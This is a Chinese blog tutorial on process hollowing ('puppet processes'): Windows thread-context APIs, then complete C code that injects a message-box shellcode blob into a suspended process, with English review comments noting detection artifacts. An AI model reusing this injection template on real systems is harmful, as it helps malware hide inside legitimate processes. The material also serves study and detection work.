隐藏技术-傀儡进程

本文最后更新于:2021-08-09 晚上

傀儡进程

借用正常软件进程或系统进程的外壳来执行恶意操作。

函数介绍

GetThreadContext

检索指定线程的上下文

64位程序可以使用Wow64GetThreadContext检索WOW64线程的上下文。

BOOL GetThreadContext(
HANDLE hThread,
LPCONTEXT lpContext
);

hThread:要检索其上下文的线程的句柄。句柄必须有THREAD_GET_CONTEXT访问权限。

lpContext:指向 CONTEXT 结构的指针,用于接收指定线程的上下文。该结构中的 ContextFlags 成员指定要检索线程上下文的哪些部分。CONTEXT 结构的布局与处理器架构密切相关。

返回值:成功返回不为0,否则为0。

SetThreadContext

设置指定线程的上下文。64 位程序可以使用 Wow64SetThreadContext 设置 WOW64 线程的上下文。

BOOL SetThreadContext(
HANDLE hThread,
const CONTEXT *lpContext
);

hThread:指定线程的句柄,并将设置其上下文。该句柄必须具有线程的THREAD_SET_CONTEXT权限。

lpContext:指向 CONTEXT 结构的指针,其中包含要为指定线程设置的上下文。此结构中 ContextFlags 成员的值指定要设置线程上下文的哪些部分。

返回值:如果成功设置了上下文,则返回值为非 0,否则为 0。

ResumeThread

减少线程的暂停计数。当暂停计数减到0时,恢复线程的执行。

DWORD ResumeThread(
HANDLE hThread
);

hThread:要重新启动线程的句柄。该句柄必须具有THREAD_SUSPEND_RESUME权限。

返回值:如果成功,返回值是线程先前挂起的计数,如果失败,则返回(DWORD)-1。

代码实现

#include <Windows.h>
#include <stdio.h>
/* Forward declaration for the routine defined below main(). The name is missing an 'e' (sic); it is kept as-is because main() calls it by this spelling. */
BOOL ReplacProcess(char* pszFilePath);
/*
 * Hard-coded x86 machine code that ReplacProcess() copies into the target
 * process with WriteProcessMemory. The bytes are opaque here; the readable
 * hints are the repeated 0xC6 0x45 xx byte-store runs, which spell ASCII
 * strings on the stack ("LoadLibraryA", "MessageBoxA", "User32.dll"), and
 * the article reports a message box as the visible result.
 * Declared as plain char, so values above 0x7F are converted to a signed
 * type (implementation-defined, not undefined behaviour).
 * From a defensive standpoint this fixed byte sequence is the easiest
 * artifact to signature, both in the file on disk and once it has been
 * written into the hollowed process.
 */
char data[] = { 0x55 ,0x8B ,0xEC ,0x83 ,0xEC ,0x4C ,0xE8 ,0x15 ,0x01 ,0x00 ,0x00 ,0x89 ,0x45 ,0xFC ,0x8B ,0x45 ,0xFC ,0x50
,0xE8 ,0x29 ,0x01 ,0x00 ,0x00 ,0x83 ,0xC4 ,0x04 ,0x89 ,0x45 ,0xF8 ,0xC6 ,0x45 ,0xB4 ,0x4C ,0xC6 ,0x45 ,0xB5
,0x6F ,0xC6 ,0x45 ,0xB6 ,0x61 ,0xC6 ,0x45 ,0xB7 ,0x64 ,0xC6 ,0x45 ,0xB8 ,0x4C ,0xC6 ,0x45 ,0xB9 ,0x69 ,0xC6
,0x45 ,0xBA ,0x62 ,0xC6 ,0x45 ,0xBB ,0x72 ,0xC6 ,0x45 ,0xBC ,0x61 ,0xC6 ,0x45 ,0xBD ,0x72 ,0xC6 ,0x45 ,0xBE
,0x79 ,0xC6 ,0x45 ,0xBF ,0x41 ,0xC6 ,0x45 ,0xC0 ,0x00 ,0x8D ,0x4D ,0xB4 ,0x51 ,0x8B ,0x55 ,0xFC ,0x52 ,0xFF
,0x55 ,0xF8 ,0x89 ,0x45 ,0xF4 ,0xC6 ,0x45 ,0xC4 ,0x4D ,0xC6 ,0x45 ,0xC5 ,0x65 ,0xC6 ,0x45 ,0xC6 ,0x73 ,0xC6
,0x45 ,0xC7 ,0x73 ,0xC6 ,0x45 ,0xC8 ,0x61 ,0xC6 ,0x45 ,0xC9 ,0x67 ,0xC6 ,0x45 ,0xCA ,0x65 ,0xC6 ,0x45 ,0xCB
,0x42 ,0xC6 ,0x45 ,0xCC ,0x6F ,0xC6 ,0x45 ,0xCD ,0x78 ,0xC6 ,0x45 ,0xCE ,0x41 ,0xC6 ,0x45 ,0xCF ,0x00 ,0xC6
,0x45 ,0xD0 ,0x55 ,0xC6 ,0x45 ,0xD1 ,0x73 ,0xC6 ,0x45 ,0xD2 ,0x65 ,0xC6 ,0x45 ,0xD3 ,0x72 ,0xC6 ,0x45 ,0xD4
,0x33 ,0xC6 ,0x45 ,0xD5 ,0x32 ,0xC6 ,0x45 ,0xD6 ,0x2E ,0xC6 ,0x45 ,0xD7 ,0x64 ,0xC6 ,0x45 ,0xD8 ,0x6C ,0xC6
,0x45 ,0xD9 ,0x6C ,0xC6 ,0x45 ,0xDA ,0x00 ,0x8D ,0x45 ,0xC4 ,0x50 ,0x8D ,0x4D ,0xD0 ,0x51 ,0xFF ,0x55 ,0xF4
,0x50 ,0xFF ,0x55 ,0xF8 ,0x89 ,0x45 ,0xF0 ,0xC6 ,0x45 ,0xDC ,0x62 ,0xC6 ,0x45 ,0xDD ,0x31 ,0xC6 ,0x45 ,0xDE
,0x61 ,0xC6 ,0x45 ,0xDF ,0x63 ,0xC6 ,0x45 ,0xE0 ,0x6B ,0xC6 ,0x45 ,0xE1 ,0x69 ,0xC6 ,0x45 ,0xE2 ,0x65 ,0xC6
,0x45 ,0xE3 ,0x21 ,0xC6 ,0x45 ,0xE4 ,0x00 ,0xC6 ,0x45 ,0xE8 ,0x74 ,0xC6 ,0x45 ,0xE9 ,0x65 ,0xC6 ,0x45 ,0xEA
,0x73 ,0xC6 ,0x45 ,0xEB ,0x74 ,0xC6 ,0x45 ,0xEC ,0x00 ,0x6A ,0x00 ,0x8D ,0x55 ,0xE8 ,0x52 ,0x8D ,0x45 ,0xDC
,0x50 ,0x6A ,0x00 ,0xFF ,0x55 ,0xF0 ,0x33 ,0xC0 ,0x8B ,0xE5 ,0x5D ,0xC3 ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC
,0x64 ,0xA1 ,0x30 ,0x00 ,0x00 ,0x00 ,0x8B ,0x40 ,0x0C ,0x8B ,0x40 ,0x14 ,0x8B ,0x00 ,0x8B ,0x00 ,0x8B ,0x40
,0x10 ,0xC3 ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0xCC ,0x55 ,0x8B ,0xEC ,0x83
,0xEC ,0x2C ,0x8B ,0x45 ,0x08 ,0x89 ,0x45 ,0xF8 ,0x8B ,0x4D ,0xF8 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x51 ,0x3C ,0x89
,0x55 ,0xE8 ,0xB8 ,0x08 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8 ,0x00 ,0x8B ,0x55 ,0xE8 ,0x8B ,0x45 ,0xF8 ,0x03 ,0x44
,0x0A ,0x78 ,0x89 ,0x45 ,0xF0 ,0x8B ,0x4D ,0xF0 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x51 ,0x20 ,0x89 ,0x55 ,0xE0 ,0x8B
,0x45 ,0xF0 ,0x8B ,0x4D ,0xF8 ,0x03 ,0x48 ,0x24 ,0x89 ,0x4D ,0xDC ,0x8B ,0x55 ,0xF0 ,0x8B ,0x45 ,0xF8 ,0x03
,0x42 ,0x1C ,0x89 ,0x45 ,0xD8 ,0x8B ,0x4D ,0xF0 ,0x8B ,0x51 ,0x18 ,0x89 ,0x55 ,0xE4 ,0xC7 ,0x45 ,0xEC ,0x00
,0x00 ,0x00 ,0x00 ,0xC7 ,0x45 ,0xF4 ,0x00 ,0x00 ,0x00 ,0x00 ,0xEB ,0x09 ,0x8B ,0x45 ,0xF4 ,0x83 ,0xC0 ,0x01
,0x89 ,0x45 ,0xF4 ,0x8B ,0x4D ,0xF4 ,0x3B ,0x4D ,0xE4 ,0x0F ,0x83 ,0x6D ,0x01 ,0x00 ,0x00 ,0x8B ,0x55 ,0xF4
,0x8B ,0x45 ,0xE0 ,0x8B ,0x4D ,0xF8 ,0x03 ,0x0C ,0x90 ,0x89 ,0x4D ,0xFC ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B
,0xC2 ,0x00 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x47 ,0x0F ,0x85 ,0x41 ,0x01 ,0x00 ,0x00
,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE0 ,0x00 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x65
,0x0F ,0x85 ,0x29 ,0x01 ,0x00 ,0x00 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0xD1 ,0xE0 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE
,0x14 ,0x01 ,0x83 ,0xFA ,0x74 ,0x0F ,0x85 ,0x12 ,0x01 ,0x00 ,0x00 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8
,0x03 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x50 ,0x0F ,0x85 ,0xFA ,0x00 ,0x00 ,0x00 ,0xB9
,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE1 ,0x02 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x72 ,0x0F
,0x85 ,0xE2 ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1 ,0x05 ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE
,0x0C ,0x10 ,0x83 ,0xF9 ,0x6F ,0x0F ,0x85 ,0xCA ,0x00 ,0x00 ,0x00 ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC2
,0x06 ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x63 ,0x0F ,0x85 ,0xB2 ,0x00 ,0x00 ,0x00 ,0xB8
,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC8 ,0x07 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x41 ,0x0F
,0x85 ,0x9A ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC1 ,0xE1 ,0x03 ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE
,0x04 ,0x0A ,0x83 ,0xF8 ,0x64 ,0x0F ,0x85 ,0x82 ,0x00 ,0x00 ,0x00 ,0xB9 ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1
,0x09 ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE ,0x0C ,0x10 ,0x83 ,0xF9 ,0x64 ,0x75 ,0x6E ,0xBA ,0x01 ,0x00 ,0x00 ,0x00
,0x6B ,0xC2 ,0x0A ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA ,0x72 ,0x75 ,0x5A ,0xB8 ,0x01 ,0x00
,0x00 ,0x00 ,0x6B ,0xC8 ,0x0B ,0x8B ,0x55 ,0xFC ,0x0F ,0xBE ,0x04 ,0x0A ,0x83 ,0xF8 ,0x65 ,0x75 ,0x46 ,0xB9
,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xD1 ,0x0C ,0x8B ,0x45 ,0xFC ,0x0F ,0xBE ,0x0C ,0x10 ,0x83 ,0xF9 ,0x73 ,0x75
,0x32 ,0xBA ,0x01 ,0x00 ,0x00 ,0x00 ,0x6B ,0xC2 ,0x0D ,0x8B ,0x4D ,0xFC ,0x0F ,0xBE ,0x14 ,0x01 ,0x83 ,0xFA
,0x73 ,0x75 ,0x1E ,0x8B ,0x45 ,0xF4 ,0x8B ,0x4D ,0xDC ,0x0F ,0xB7 ,0x14 ,0x41 ,0x89 ,0x55 ,0xEC ,0x8B ,0x45
,0xEC ,0x8B ,0x4D ,0xD8 ,0x8B ,0x55 ,0xF8 ,0x03 ,0x14 ,0x81 ,0x89 ,0x55 ,0xD4 ,0xEB ,0x05 ,0xE9 ,0x7E ,0xFE
,0xFF ,0xFF ,0x8B ,0x45 ,0xD4 ,0x8B ,0xE5 ,0x5D ,0xC3 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 };
/*
 * Entry point: runs ReplacProcess() against a hard-coded executable path
 * (specific to the author's machine) and reports whether it returned TRUE.
 * Always exits with status 0, regardless of the outcome.
 */
int main()
{
    const char *report = (ReplacProcess("C:\\Users\\Tophanter\\Desktop\\ConsoleApplication1.exe") == TRUE)
        ? "傀儡进程成功\n"
        : "失败\n";
    fputs(report, stdout);
    return 0;
}
/*
 * Launches pszFilePath as a suspended process, overwrites the memory at the
 * address held in the main thread's Eax register with the global `data` blob,
 * and resumes the thread -- the "puppet process" (process hollowing) technique
 * the article describes.
 *
 * pszFilePath: path of the executable to launch. It is passed as
 *              lpApplicationName, so no command line is parsed from it.
 * Returns TRUE when every Win32 call reported success, FALSE at the first
 * failure (a message is printed before returning).
 *
 * x86 only: CONTEXT.Ebx and CONTEXT.Eax are fields of the 32-bit CONTEXT layout.
 *
 * NOTE(review): no CloseHandle or TerminateProcess appears anywhere in this
 * function -- on every FALSE path the suspended child is left alive, and on
 * every path pi.hProcess / pi.hThread leak.
 * NOTE(review): CreateProcess(CREATE_SUSPENDED) -> GetThreadContext ->
 * WriteProcessMemory -> ResumeThread is the textbook hollowing sequence that
 * endpoint detection commonly keys on; the unused suspended child on failure
 * paths is a further observable artifact.
 */
BOOL ReplacProcess(char* pszFilePath)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
CONTEXT threadContext = { 0 };
// si and pi are zeroed here; threadContext is already zero-initialised by
// its declaration, so the third RtlZeroMemory call is redundant.
RtlZeroMemory(&si, sizeof(si));
RtlZeroMemory(&pi, sizeof(pi));
RtlZeroMemory(&threadContext, sizeof(threadContext));
si.cb = sizeof(STARTUPINFO);
BOOL Flag = FALSE;
// Create the target process in the suspended state so that its main thread
// has not yet run any code of its own.
Flag = CreateProcess(pszFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
if (Flag == FALSE) {
printf("创建挂起进程失败\n");
return FALSE;
}
// Fetch the main thread's full register context.
threadContext.ContextFlags = CONTEXT_FULL;
Flag = GetThreadContext(pi.hThread, &threadContext);
if (Flag == FALSE) {
printf("获取线程上下文失败\n");
return FALSE;
}
// Original comment (translated): once the target's main-thread context is in
// hand, Ebx holds the PEB address; the field at PEB offset 0x8 is
// AddressOfImageBase (ImageBaseAddress in the documented PEB layout), so
// reading ctx.Ebx + 0x8 yields the target's load base.
// NOTE(review): lpBuffer receives that value but is never used afterwards --
// this read is dead code. The hard-coded size 4 also assumes a 32-bit pointer.
LPVOID lpBuffer = 0;
Flag = ReadProcessMemory(pi.hProcess, (LPVOID)(threadContext.Ebx + 0x8), &lpBuffer, 4, NULL);
if (Flag == FALSE) {
printf("读取内存数据失败\n");
return FALSE;
}
// Write the shellcode blob to the address held in Eax (for a freshly created
// x86 process this is presumably the image entry point -- not established here).
Flag = WriteProcessMemory(pi.hProcess, (LPVOID)threadContext.Eax, data, sizeof(data), NULL);
if (Flag == FALSE) {
printf("写入数据失败\n");
return FALSE;
}
// Resume the main thread. The return value (previous suspend count, or
// (DWORD)-1 on failure) is not checked.
ResumeThread(pi.hThread);
return TRUE;
}

运行程序后,可以看到 shellcode 的内容成功弹出。

使用任务管理器查看可以看到傀儡进程。

参考

《Windows黑客编程技术详解》

创建傀儡进程代码

